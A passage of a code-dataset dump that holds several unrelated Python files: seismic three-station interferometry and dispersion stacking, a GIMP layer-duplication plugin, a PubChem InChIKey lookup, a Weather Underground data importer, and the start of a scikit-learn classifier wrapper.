taperl=inftan.taperl, snr=inftan.snr, fmatch=inftan.fmatch, nfin=inftan.nfin,\n npoints=inftan.npoints, perc=inftan.perc, phvelname=phvelname)\n else:\n ell_atr.aftan(pmf=inftan.pmf, piover4 = ell_piover4, vmin=inftan.vmin, vmax=inftan.vmax, tmin=inftan.tmin, tmax=inftan.tmax,\n tresh=inftan.tresh, ffact=inftan.ffact, taperl=inftan.taperl, snr=inftan.snr, fmatch=inftan.fmatch, nfin=inftan.nfin,\n npoints=inftan.npoints, perc=inftan.perc, phvelname=phvelname)\n # SNR\n ell_atr.get_snr(ffact = inftan.ffact)\n # save aftan\n outdispfname = ellfname[:-4] + '.npz'\n outarr = np.array([dist0, ell_atr.stats.sac.user0])\n ell_atr.ftanparam.write_npy(outfname = outdispfname, outarr = outarr)\n # source station in hypobolic stationary phase zone\n hyp_piover4 = 0.\n for hypfname in hyplst:\n hyptr = obspy.read(hypfname)[0]\n hyp_atr = pyaftan.aftantrace(hyptr.data, hyptr.stats)\n hyp_atr.makesym()\n hyp_atr.stats.sac.dist = dist0 + hyp_atr.stats.sac.user0 # distance correction\n phvelname = self.prephdir + \"/%s.%s.pre\" %(staid1, staid2)\n if not os.path.isfile(phvelname):\n print ('*** WARNING: '+ phvelname+' not exists!')\n continue\n # aftan analysis\n if self.f77:\n hyp_atr.aftanf77(pmf=inftan.pmf, piover4 = hyp_piover4, vmin=inftan.vmin, vmax=inftan.vmax, tmin=inftan.tmin, tmax=inftan.tmax,\n tresh=inftan.tresh, ffact=inftan.ffact, taperl=inftan.taperl, snr=inftan.snr, fmatch=inftan.fmatch, nfin=inftan.nfin,\n npoints=inftan.npoints, perc=inftan.perc, phvelname=phvelname)\n else:\n hyp_atr.aftan(pmf=inftan.pmf, piover4 = hyp_piover4, vmin=inftan.vmin, vmax=inftan.vmax, tmin=inftan.tmin, tmax=inftan.tmax,\n tresh=inftan.tresh, ffact=inftan.ffact, taperl=inftan.taperl, snr=inftan.snr, fmatch=inftan.fmatch, nfin=inftan.nfin,\n npoints=inftan.npoints, perc=inftan.perc, phvelname=phvelname)\n # SNR\n hyp_atr.get_snr(ffact = inftan.ffact)\n # save aftan\n outdispfname = hypfname[:-4] + '.npz'\n outarr = np.array([dist0, hyp_atr.stats.sac.user0])\n hyp_atr.ftanparam.write_npy(outfname = outdispfname, outarr = outarr)\n with open(logfname, 'w') as fid:\n fid.writelines('SUCCESS\\n')\n # # # if len(ellflst) > 0 or len(hyplst) > 0:\n # # # with open(logfname, 'w') as fid:\n # # # fid.writelines('SUCCESS\\n')\n # # # else:\n # # # with open(logfname, 'w') as fid:\n # # # fid.writelines('NODATA\\n')\n return \n \n def direct_wave_stack_disp(self, process_id= '', verbose = False):\n \"\"\"stack dispersion results\n \"\"\"\n if verbose:\n self.print_info(process_id = process_id)\n chan1 = self.channel[0]\n chan2 = self.channel[1]\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' + self.stacode2\n if len(glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.npz')) > 0:\n is_sync = True\n npzfilelst = glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.npz')\n elif len(glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.npz')) > 0:\n is_sync = False\n npzfilelst = glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.npz')\n else:\n return\n dist0, az0, baz0= obspy.geodetics.gps2dist_azimuth(self.stla1, self.stlo1, self.stla2, self.stlo2)\n dist0 /= 1000.\n #======================\n # load raw aftan data\n #======================\n raw_pers = []\n raw_grvel = []\n raw_phvel = []\n raw_snr = []\n distances = []\n Tmin = 999.\n Tmax = -999.\n Naftan = 0\n for npzfname in npzfilelst:\n fparam = pyaftan.ftanParam()\n outarr = fparam.load_npy(npzfname)\n if fparam.nfout2_2 == 0:\n continue\n if np.any(np.isnan(fparam.arr2_2[8, :fparam.nfout2_2])) or np.any(np.isnan(fparam.arr2_2[3, :fparam.nfout2_2])):\n print ('!!! NaN detected: '+staid1+'_'+staid2)\n continue\n if np.where(fparam.arr2_2[8, :fparam.nfout2_2] > self.snr_thresh)[0].size < self.nfmin:\n continue\n if np.any(fparam.arr2_2[3, :fparam.nfout2_2] < 0.):\n continue\n Naftan += 1\n raw_pers.append(fparam.arr2_2[1, :fparam.nfout2_2])\n raw_grvel.append(fparam.arr2_2[2, :fparam.nfout2_2])\n raw_phvel.append(fparam.arr2_2[3, :fparam.nfout2_2])\n raw_snr.append(fparam.arr2_2[8, :fparam.nfout2_2])\n distances.append(outarr[0] + outarr[1])\n # get min/max periods\n if fparam.arr2_2[1, 0] < Tmin and fparam.arr2_2[8, 0] > self.snr_thresh:\n Tmin = fparam.arr2_2[1, 0]\n if fparam.arr2_2[1, fparam.nfout2_2 - 1] > Tmax and fparam.arr2_2[8, fparam.nfout2_2 - 1] > self.snr_thresh:\n Tmax = fparam.arr2_2[1, fparam.nfout2_2 - 1]\n if Naftan < self.Ntrace_min:\n return \n #=======================================\n # 1st iteration statistical analysis\n #=======================================\n pers = self.pers\n pers = pers[(pers >= Tmin)*(pers <= Tmax)]\n phvelarr = np.zeros((Naftan, pers.size))\n snrarr = np.zeros((Naftan, pers.size))\n indarr = np.zeros((Naftan, pers.size), dtype = bool)\n for i in range(Naftan):\n phvel_spl = scipy.interpolate.CubicSpline(raw_pers[i], raw_phvel[i])\n snr_spl = scipy.interpolate.CubicSpline(raw_pers[i], raw_snr[i])\n phvelarr[i, :] = phvel_spl(pers)\n snrarr[i, :] = snr_spl(pers)\n indarr[i, :] = (pers <= raw_pers[i][-1])*(pers >= raw_pers[i][0])*(snrarr[i, :] >=self.snr_thresh)\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0):\n # # # print ('!!! GAP detected, 1st iteration : '+staid1+'_'+staid2)\n ist, ibe = _get_pers_ind(Nm)\n pers = pers[ist:ibe+1]\n phvelarr = phvelarr[:,ist:ibe+1]\n snrarr = snrarr[:,ist:ibe+1]\n indarr = indarr[:,ist:ibe+1]\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0): # debug\n raise ValueError('CHECK number of measure: '+staid1+'_'+staid2)\n tmpphvel = (phvelarr*indarr).sum(axis = 0)\n meanvel = tmpphvel/Nm\n unarr = np.sum( indarr*(phvelarr - meanvel)**2, axis = 0)\n unarr = unarr/Nm/Nm\n unarr = np.sqrt(unarr)\n # throw out outliers\n indout = abs(phvelarr - meanvel) > 3*unarr\n indarr[indout] = False\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0): # debug\n raise ValueError('CHECK number of measure: '+staid1+'_'+staid2)\n tmpphvel = (phvelarr*indarr).sum(axis = 0)\n meanvel = tmpphvel/Nm\n mean_phvel_spl = scipy.interpolate.CubicSpline(pers, meanvel)\n #====================\n # correct cycle skip\n #====================\n for i in range(Naftan):\n tmppers = raw_pers[i]\n tmpC = raw_phvel[i]\n tmpU = raw_grvel[i]\n meanC = mean_phvel_spl(tmppers[-1])\n omega = 2.*np.pi/tmppers\n phase = omega*(distances[i]/tmpU - distances[i]/tmpC)\n if tmpC[-1] > meanC:\n phase -= 2.*np.pi\n else:\n phase += 2.*np.pi\n tmpC_new = omega*distances[i]/(omega*distances[i]/tmpU - phase)\n meanCs = mean_phvel_spl(tmppers)\n del_C1 = np.sqrt( np.sum((tmpC-meanCs)**2/tmpC.size) )\n del_C2 = np.sqrt( np.sum((tmpC_new-meanCs)**2/tmpC.size) )\n if del_C1 > del_C2:\n raw_phvel[i][:] = tmpC_new\n #=======================================\n # 2nd iteration statistical analysis\n #======================================= \n phvelarr = np.zeros((Naftan, pers.size))\n indarr = np.zeros((Naftan, pers.size), dtype = bool)\n for i in range(Naftan):\n phvel_spl = scipy.interpolate.CubicSpline(raw_pers[i], raw_phvel[i])\n tmpphvel = phvel_spl(pers)\n phvelarr[i, :] = tmpphvel\n indarr[i, :] = (pers <= raw_pers[i][-1])*(pers >= raw_pers[i][0])*(snrarr[i, :] >=self.snr_thresh)*\\\n (tmpphvel >= self.vmin)*(tmpphvel <= self.vmax)\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0):\n # # # print ('!!! GAP detected 2nd iteration : '+staid1+'_'+staid2)\n ist, ibe = _get_pers_ind(Nm)\n pers = pers[ist:ibe+1]\n phvelarr = phvelarr[:,ist:ibe+1]\n snrarr = snrarr[:,ist:ibe+1]\n indarr = indarr[:,ist:ibe+1]\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0): # debug\n raise ValueError('CHECK number of measure: '+staid1+'_'+staid2)\n tmpphvel = (phvelarr*indarr).sum(axis = 0)\n meanvel = tmpphvel/Nm\n unarr = np.sum( indarr*(phvelarr-meanvel)**2, axis = 0)\n unarr = unarr/Nm/Nm\n unarr = np.sqrt(unarr)\n # outliers\n indout = abs(phvelarr - meanvel) > 2*unarr\n indarr[indout] = False\n # discard the whole dispersion curve if not enough points kept\n Npoint = indarr.sum(axis = 1)\n indout2 = Npoint < self.nfmin\n indout2 = np.tile(indout2, (pers.size, 1))\n indout2 = indout2.T\n indarr[indout2] = False\n # detect gaps and keep the longest no-gap periods\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0):\n # # # print ('!!! GAP detected 2nd iteration : '+staid1+'_'+staid2)\n ist, ibe = _get_pers_ind(Nm)\n pers = pers[ist:ibe+1]\n phvelarr = phvelarr[:,ist:ibe+1]\n snrarr = snrarr[:,ist:ibe+1]\n indarr = indarr[:,ist:ibe+1]\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0): # debug\n raise ValueError('CHECK number of measure: '+staid1+'_'+staid2)\n # final stacked results \n tmpphvel = (phvelarr*indarr).sum(axis = 0)\n mean_phvel = tmpphvel/Nm\n unarr = np.sum( indarr*(phvelarr - mean_phvel)**2, axis = 0)\n unarr = unarr/Nm/Nm\n unarr = np.sqrt(unarr)\n ftrig, trig, ierr, ist, ibe = _trigger(mean_phvel.size, np.float32(mean_phvel),\\\n np.float32(2*np.pi/pers), np.float32(self.jump_thresh) )\n index = np.zeros(pers.size, dtype = bool)\n if ierr != 0:\n index[ist:ibe] = True\n # save results\n outdir = self.outdir + '/DW_DISP/'+staid1\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n outfname = outdir + '/DISP_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'.npz'\n np.savez( outfname, pers, mean_phvel, unarr, snrarr, Nm, index)\n # save log files\n logfname = self.datadir + '/logs_dw_stack_disp/'+ staid1 + '/' + staid1 +'_'+staid2+'.log'\n if not os.path.isdir(self.datadir + '/logs_dw_stack_disp/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_stack_disp/'+ staid1)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(self.datadir + '/logs_dw_stack_disp/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_stack_disp/'+ staid1)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('SUCCESS\\n')\n return \n \n def direct_wave_phase_shift_stack(self, process_id= '', verbose = False):\n \"\"\"direct wave three station interferogram phase shift stack\n \"\"\"\n if verbose:\n self.print_info(process_id = process_id)\n chan1 = self.channel[0]\n chan2 = self.channel[1]\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' + self.stacode2\n if len(glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.SAC')) > 0:\n is_sync = True\n elif len(glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.SAC')) > 0:\n is_sync = False\n else:\n return \n dist0, az0, baz0= obspy.geodetics.gps2dist_azimuth(self.stla1, self.stlo1, self.stla2, self.stlo2)\n dist0 /= 1000.\n if is_sync:\n saclst = glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.SAC')\n else:\n saclst = glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.SAC')\n #==============================\n # reference dispersion curve\n #==============================\n if len(self.phvel_ref) == 0 or self.prefer_c3_disp:\n dispfname = self.datadir + '/DW_DISP/'+staid1 + '/DISP_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'.npz'\n if (not os.path.isfile(dispfname)) and len(self.phvel_ref) == 0:\n return \n inarr = np.load(dispfname)\n pers = inarr['arr_0']\n phvel = inarr['arr_1']\n snr = inarr['arr_3']\n if np.any(np.isnan(phvel)) or np.any(np.isnan(pers)) or np.any(np.isnan(snr)):\n pers = self.pers_ref\n phvel = self.phvel_ref\n if len(self.phvel_ref) == 0:\n print ('!!! NaN detected: '+staid1+'_'+staid2)\n return\n else: \n pers = self.pers_ref\n phvel = self.phvel_ref\n # bound check\n if np.any(phvel < self.vmin) or np.any(phvel > self.vmax):\n pers = self.pers_ref\n phvel = self.phvel_ref\n if len(self.phvel_ref) == 0:\n print ('!!! phase velocity out of bound: '+staid1+'_'+staid2)\n return\n if np.any(phvel < self.vmin) or np.any(phvel > self.vmax):\n print ('!!! phase velocity out of bound: '+staid1+'_'+staid2)\n return\n # length check\n if len(phvel) == 0:\n pers = self.pers_ref\n phvel = self.phvel_ref\n if len(self.phvel_ref) == 0:\n print ('!!! no reference phase velocity: '+staid1+'_'+staid2)\n return\n init_trace = False\n for sacfname in saclst:\n tr = obspy.read(sacfname)[0]\n dt = tr.stats.delta\n d = tr.stats.sac.user0\n dist = tr.stats.sac.user0 + tr.stats.sac.dist\n # get symmetric component\n if abs(tr.stats.sac.b+tr.stats.sac.e) < tr.stats.delta:\n nhalf = int((tr.stats.npts-1)/2+1)\n neg = tr.data[:nhalf]\n pos = tr.data[nhalf-1:tr.stats.npts]\n neg = neg[::-1]\n tr.data = (pos+neg)/2 \n tr.stats.starttime = tr.stats.starttime+tr.stats.sac.e\n tr.stats.sac.b = 0.\n else:\n etime = tr.stats.endtime - (tr.stats.sac.e - tr.stats.sac.b)/2.\n tr.trim(endtime = etime)\n #=========\n # get SNR\n #=========\n time = tr.times()\n begT = time[0]\n endT = time[-1]\n data_envelope = obspy.signal.filter.envelope(tr.data)\n minT = dist/self.vmax \n maxT = dist/self.vmin \n ind = (time >= minT)*(time <= maxT)\n amp_max = data_envelope[ind].max()\n # noise window\n minT = maxT + self.Tmax + 500.\n if( (endT - minT) < 1100. ):\n maxT = endT - 10.\n else:\n minT = endT - 1100.\n maxT = endT - 100.\n ib = (int)((minT-begT)/dt)\n ie = (int)((maxT-begT)/dt)+2\n tempnoise = tr.data[ib:ie]\n if ie-ib-1<= 0:\n continue\n noiserms = np.sqrt(( np.sum(tempnoise**2))/(ie-ib-1.) )\n if noiserms == 0 or np.isnan(noiserms):\n continue\n if amp_max/noiserms < self.snr_thresh:\n # # # print (amp_max, noiserms, sacfname)\n continue\n rms = np.sqrt(( np.sum(tr.data**2))/(tr.data.size) )\n weight = 1./rms\n if 'ELL.SAC' in sacfname:\n iphase = np.pi/4\n elif 'HYP.SAC' in sacfname:\n iphase = -np.pi/4\n else:\n raise ValueError('Unexpected type of C3')\n # perform phase shift\n tr.data = _tshift_fft(tr.data, dt, pers, phvel, iphase, d)\n tr.data *= weight\n # debug\n # outfname = sacfname[:-4] + '_shift.sac'\n # tr.write(outfname, format='SAC')\n \n if not init_trace:\n stack_trace = tr.copy()\n stack_trace.stats.sac.user3 = 1\n init_trace = True\n continue\n else:\n stack_trace.data += tr.data\n stack_trace.stats.sac.user3 += 1\n if not init_trace:\n if verbose:\n print ('!!!NO C3 data for: '+ staid1+'_'+chan1+'_'+staid2+'_'+chan2)\n return\n # save data\n outdir = self.outdir + '/STACK_C3/'+staid1\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n outfname= outdir+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'.SAC'\n stack_trace.write(outfname, format='SAC')\n # save log files\n logfname = self.datadir + '/logs_dw_stack/'+ staid1 + '/' + staid1 +'_'+staid2+'.log'\n if not os.path.isdir(self.datadir + '/logs_dw_stack/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_stack/'+ staid1)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(self.datadir + '/logs_dw_stack/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_stack/'+ staid1)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('SUCCESS\\n')\n return \n \ndef direct_wave_interfere_for_mp(in_c3_pair, verbose=False, verbose2=False):\n process_id = multiprocessing.current_process().pid\n in_c3_pair.direct_wave_interfere(verbose = verbose, verbose2 = verbose2, process_id = process_id)\n return\n\ndef direct_wave_aftan_for_mp(in_c3_pair, verbose=False, verbose2=False):\n process_id = multiprocessing.current_process().pid\n try:\n in_c3_pair.direct_wave_aftan(verbose = verbose, process_id = process_id)\n except:\n # write log files\n outdir = in_c3_pair.datadir + '/logs_dw_aftan/'+ in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1\n logfname = outdir + '/' + in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1 +\\\n '_'+in_c3_pair.netcode2 + '.' + in_c3_pair.stacode2+'.log'\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('FAILED\\n')\n return\n\ndef direct_wave_stack_disp_for_mp(in_c3_pair, verbose=False, verbose2=False):\n process_id = multiprocessing.current_process().pid\n try:\n in_c3_pair.direct_wave_stack_disp(verbose = verbose, process_id = process_id)\n except:\n # write log files\n outdir = in_c3_pair.datadir + '/logs_dw_stack_disp/'+ in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1\n logfname = outdir + '/' + in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1 +\\\n '_'+in_c3_pair.netcode2 + '.' + in_c3_pair.stacode2+'.log'\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('FAILED\\n')\n return\n\ndef direct_wave_phase_shift_stack_for_mp(in_c3_pair, verbose=False, verbose2=False):\n process_id = multiprocessing.current_process().pid\n try:\n in_c3_pair.direct_wave_phase_shift_stack(verbose = verbose, process_id = process_id)\n except:\n # write log files\n outdir = in_c3_pair.datadir + '/logs_dw_stack/'+ in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1\n logfname = outdir + '/' + in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1 +\\\n '_'+in_c3_pair.netcode2 + '.' + in_c3_pair.stacode2+'.log'\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('FAILED\\n')\n return\n\n","sub_path":"noise/_c3_funcs.py","file_name":"_c3_funcs.py","file_ext":"py","file_size_in_byte":41306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"283903816","text":"#!/usr/bin/env python2\n\nfrom gimpfu import *\n\nfrom itertools import cycle\n\ndef parse_pattern(pattern, offset, end):\n if end <= offset:\n return []\n if '1' not in pattern:\n return []\n out = []\n for n, x in enumerate(cycle(pattern), offset):\n if n > end or n > 10000: #failsafe\n break\n if x == '1':\n out.append(n)\n return out\n\n\ndef mass_duplicate_layers(image, layer, pattern, offset, defaultend, lastlayer):\n pdb = gimp.pdb\n if offset < 0 or offset >= len(image.layers):\n return\n if not defaultend and layer == lastlayer:\n return\n pdb.gimp_image_undo_group_start(image)\n # Copy the old layer so counting will be easier\n newlayer = layer.copy()\n newlayer.name = layer.name\n image.remove_layer(layer)\n if defaultend:\n end = len(image.layers)-1\n else:\n end = image.layers.index(lastlayer)\n patternlist = parse_pattern(pattern, offset, end)\n for i in patternlist[::-1][:-1]:\n l = newlayer.copy()\n image.add_layer(l, i)\n image.add_layer(newlayer, offset)\n pdb.gimp_image_undo_group_end(image)\n return\n\nregister(\n \"nycz_mass_duplicate_layers\",\n \"Mass duplicate layers\",\n \"Duplicate a layer and place it at specific intervals among the existing layers\",\n \"Nycz\",\n \"Nycz\",\n \"August 2015\",\n \"/Nycz/Mass duplicate layers...\",\n \"RGBA*\",\n [\n (PF_STRING, \"pattern\", \"Pattern (1 shows, 0 hides):\", \"1\"),\n (PF_INT, \"offset\", \"Offset to use:\", 0),\n (PF_TOGGLE, \"defaultend\", \"Ignore end point:\", 1),\n (PF_LAYER, \"lastlayer\", \"Last layer to use:\", None),\n ],\n [],\n mass_duplicate_layers,\n )\n\nmain()\n","sub_path":"NyczMassDuplicateLayers.py","file_name":"NyczMassDuplicateLayers.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"651318147","text":"import logging\nimport requests\nfrom functools import lru_cache\n\n\npubchem_url = 'https://pubchem.ncbi.nlm.nih.gov/rest/pug'\n\n\nlogger = logging.getLogger(__name__)\n\n\n@lru_cache(maxsize=5000)\ndef get_inchi_key(pubchem_cid):\n \"\"\"Return the InChIKey for a given PubChem CID.\n\n Parameters\n ----------\n pubchem_cid : str\n The PubChem CID whose InChIKey should be returned.\n\n Returns\n -------\n str\n The InChIKey corresponding to the PubChem CID.\n \"\"\"\n url = '%s/compound/cid/%s/property/InChIKey/TXT' % \\\n (pubchem_url, pubchem_cid)\n res = requests.get(url)\n if res.status_code != 200:\n logger.error('Could not retrieve InChIKey for %s' % pubchem_cid)\n return None\n return res.text.strip()\n","sub_path":"indra/databases/pubchem_client.py","file_name":"pubchem_client.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"650281168","text":"#!/usr/bin/env python3\n\nimport datetime\nimport argparse\nimport requests\nimport csv\nimport dateutil.parser\n\nimport mezuri\nDB_IP = '146.148.49.96'\n\n# Raw format from wunderground:\n# ['TimeEDT', 'TemperatureF', 'Dew PointF', 'Humidity', 'Sea Level PressureIn',\n# 'VisibilityMPH', 'Wind Direction', 'Wind SpeedMPH', 'Gust SpeedMPH',\n# 'PrecipitationIn', 'Events', 'Conditions', 'WindDirDegrees', 'DateUTC
']\n#\n# Sample row:\n# ['12:53 AM', '69.1', '62.1', '78', '30.01', '10.0', 'Calm', 'Calm', '-',\n# 'N/A', '', 'Clear', '0', '2014-08-30 04:53:00
']\n#\n# 'TimeEDT'\t\t\t\t'12:53 AM'\n# 'TemperatureF'\t\t'69.1'\n# 'Dew PointF'\t\t\t'62.1'\n# 'Humidity'\t\t\t'78'\n# 'Sea Level PressureIn',\t '30.01'\n# 'VisibilityMPH'\t\t'10.0'\n# 'Wind Direction'\t\t'Calm'\n# 'Wind SpeedMPH'\t\t'Calm'\n# 'Gust SpeedMPH',\t\t'-'\n# 'PrecipitationIn'\t\t'N/A'\n# 'Events'\t\t\t\t''\n# 'Conditions'\t\t\t'Clear'\n# 'WindDirDegrees'\t\t'0'\n# 'DateUTC
'\t\t'2014-08-30 04:53:00
']\n\ndef create_table(mt, airport, year, month, day):\n\tprint('Creating table wunderground-{}-{}-{:02d}-{:02d}'.format(airport, year, month, day))\n\tschema = {'timestamp': mezuri.ColumnTypes.datetime,\n\t\t\t 'tempF': mezuri.ColumnTypes.number,\n\t\t\t 'humidity': mezuri.ColumnTypes.number,\n\t\t\t }\n\tmt.create('wunderground-{}-{}-{:02d}-{:02d}'.format(airport, year, month, day), schema)\n\ndef strip_html(iterable):\n\tfor l in iterable:\n\t\tif len(l) == 0:\n\t\t\tcontinue\n\t\tl = l.decode('utf-8')\n\t\tl = l.replace('
', '')\n\t\tyield l\n\ndef add_data(mt, airport, year, month, day):\n\tprint(\"Fetching data from wunderground...\")\n\tURL = 'http://www.wunderground.com/history/airport/{}/{}/{}/{}/DailyHistory.html?format=1'.format(\n\t\t\tairport, year, month, day)\n\tr = requests.get(URL)\n\tc = csv.reader(strip_html(r.iter_lines()))\n\tcheck_names = False\n\tdata = []\n\tfor row in c:\n\t\tif not check_names:\n\t\t\t#if row[0] != 'TimeEDT':\n\t\t\t#\tprint(\"WARN: Skipping {}-{}-{}-{}. Expected row[0] is 'TimeEDT', but was {}\".format(\n\t\t\t#\t\tairport, year, month, day, row[0]))\n\t\t\t#\tbreak\n\t\t\tif row[1] != 'TemperatureF':\n\t\t\t\tprint(\"WARN: Skipping {}-{}-{}-{}. Expected row[1] is 'TemperatureF', but was >>{}<<\".format(\n\t\t\t\t\tairport, year, month, day, row[1]))\n\t\t\t\tbreak\n\t\t\tif row[3] != 'Humidity':\n\t\t\t\tprint(\"WARN: Skipping {}-{}-{}-{}. Expected row[3] is 'Humidity', but was >>{}<<\".format(\n\t\t\t\t\tairport, year, month, day, row[3]))\n\t\t\t\tbreak\n\t\t\tif row[13] != 'DateUTC':\n\t\t\t\tprint(\"WARN: Skipping {}-{}-{}-{}. Expected row[13] is 'DateUTC', but was >>{}<<\".format(\n\t\t\t\t\tairport, year, month, day, row[13]))\n\t\t\t\tbreak\n\t\t\tcheck_names = True\n\t\t\tcontinue\n\t\tdata.append({\n\t\t\t'timestamp': dateutil.parser.parse(row[13]+'Z'),\n\t\t\t'tempF': float(row[1]),\n\t\t\t'humidity': float(row[3])\n\t\t\t})\n\n\tprint('Adding data...')\n\tmt.add_rows(data)\n\ndef get_data(mt, airport, year, month, day):\n\tprint('Get the data back...')\n\trows = mt.get_rows(100)\n\tfor i,row in enumerate(rows):\n\t\tprint('row {}'.format(i))\n\t\tfor k,v in row.items():\n\t\t\tprint(' {:<10}: {}'.format(k,v))\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description=\"Weather Underground Import Script\")\n\tparser.add_argument('--ip', type=str, default=DB_IP)\n\tparser.add_argument('--airport', type=str, default='KARB') # Ann Arbor\n\tparser.add_argument('--year', type=int, default=2013)\n\tparser.add_argument('--month', type=int, default=8)\n\tparser.add_argument('--day', type=int, default=30)\n\n\targs = parser.parse_args()\n\n\tprint('Making a connection to Mezuri...')\n\tmt = mezuri.MezuriTable('http://'+args.ip+'/odktables', 'mezuri-10100233')\n\n\tcreate_table(mt, args.airport, args.year, args.month, args.day)\n\tadd_data(mt, args.airport, args.year, args.month, args.day)\n\t#get_data(mt, args.airport, args.year, args.month, args.day)\n","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"179772993","text":"import numpy as np\nfrom scipy.sparse import csr_matrix\nimport theanets as tn\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier, \\\n BaggingClassifier, AdaBoostClassifier, GradientBoostingClassifier\ntry:\n import tensorflow.contrib.learn as skflow\nexcept ImportError:\n print('Tensorflow not installed')\n\nfrom operator import itemgetter\nfrom scipy.stats import randint as sp_randint\nfrom numpy import random\n\nfrom sklearn.grid_search import RandomizedSearchCV\n\n\nclass DMCClassifier:\n clf = None\n\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n assert len(Y) == X.shape[0]\n self.X = X\n self.Y = Y\n self.tune_parameters = tune_parameters\n\n def __call__(self, X: csr_matrix) -> np.array:\n if self.tune_parameters:\n print(self.clf.get_params().keys())\n try:\n self.estimate_parameters_with_random_search()\n except Exception as e:\n print(e)\n pass\n self.fit()\n return self.predict(X)\n\n def report(self, grid_scores, n_top=3):\n top_scores = sorted(\n grid_scores, key=itemgetter(1), reverse=True)[:n_top]\n for i, score in enumerate(top_scores):\n print(\"Model with rank: {0}\".format(i + 1))\n print(\"Mean validation score: {0:.3f} (std: {1:.3f})\".format(\n score.mean_validation_score, np.std(score.cv_validation_scores)))\n print(\"Parameters: {0}\".format(score.parameters))\n print(\"\")\n\n def estimate_parameters_with_random_search(self):\n random_search = RandomizedSearchCV(self.clf, param_distributions=self.param_dist_random,\n n_iter=30)\n random_search.fit(self.X, self.Y)\n print(\"Random Search\")\n self.report(random_search.grid_scores_)\n\n def fit(self):\n self.clf.fit(self.X, self.Y)\n 